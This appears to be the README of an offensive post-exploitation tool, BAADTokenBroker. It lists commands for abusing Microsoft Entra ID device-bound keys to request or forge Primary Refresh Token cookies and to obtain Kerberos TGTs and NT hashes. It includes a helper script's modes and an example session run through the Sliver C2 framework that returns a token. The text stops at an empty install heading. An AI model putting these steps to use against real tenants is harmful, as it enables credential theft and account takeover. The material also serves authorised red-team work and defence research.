BAADTokenBroker Abuses Microsoft Entra ID Device-Bound Keys for PRT Hijacking
BAADTokenBroker
BAADTokenBroker is a post-exploitation tool designed to interact with Microsoft Entra ID device-bound keys.
It can:
- Request the logged-on user’s PRT cookie
- Create a PRT cookie using supplied credentials
- Acquire a TGT and NT hash by abusing Entra Kerberos mechanisms
Usage
BAADTokenBroker provides the following commands:
- info: Retrieve Entra ID information
- get_token_blob: Dump the cached token (this is mainly for research purposes and is not easy to use in engagements)
- sign_with_dkpriv: Sign provided data using the Entra device key
- sign_with_popkey: Sign provided data using the POP key
- decrypt_with_popkey: Decrypt provided data using the POP key
- sign_with_userkey: Sign provided data using the Windows Hello for Business key
- request_prt_cookie: Request a PRT cookie
- request_sso_tgs: Request a service ticket for Desktop SSO, which you can use with your favorite tools such as SeamlessPass
However, to use the commands easily for common scenarios, helper.py generates BAADTokenBroker’s command lines based on what you want to achieve.
Run helper.py with one of the following options:
- request_prt_cookie - Generates command lines to request the logged-on user’s PRT cookie
- create_prt_cookie - Generates command lines to create a PRT cookie using supplied credentials
- get_tgt - Generates command lines to request a partial TGT and session key via a PRT cookie (patched by Microsoft around April 4th, 2026)
- get_tgt_with_whfb - Generates command lines to request a partial TGT and session key via Windows Hello for Business
- get_tgt_with_sso_tgs - Generates command lines to request a partial TGT and session key via a Desktop SSO Kerberos ticket
Here is an example of retrieving a user’s PRT cookie. When you want to generate command lines for Sliver, the -s option is required.

```bash
$ python3 helper.py -s request_prt_cookie
[*] execute BAADTokenBroker as follows:
BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA
```

Execute the generated command lines as follows:

```
[localhost] sliver (_) > BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA

  -arg2:<empty> (default)
  -arg3:<empty> (default)
  -arg4:<empty> (default)
[*] Successfully executed BAADTokenBroker (coff-loader)
[*] Got output:
[*] requesting PRT Cookie...
[+] request_prt_cookie success!

eyJhbGciOiJIUzI1NiIsICJrZGZfd…(omitted)
```
Install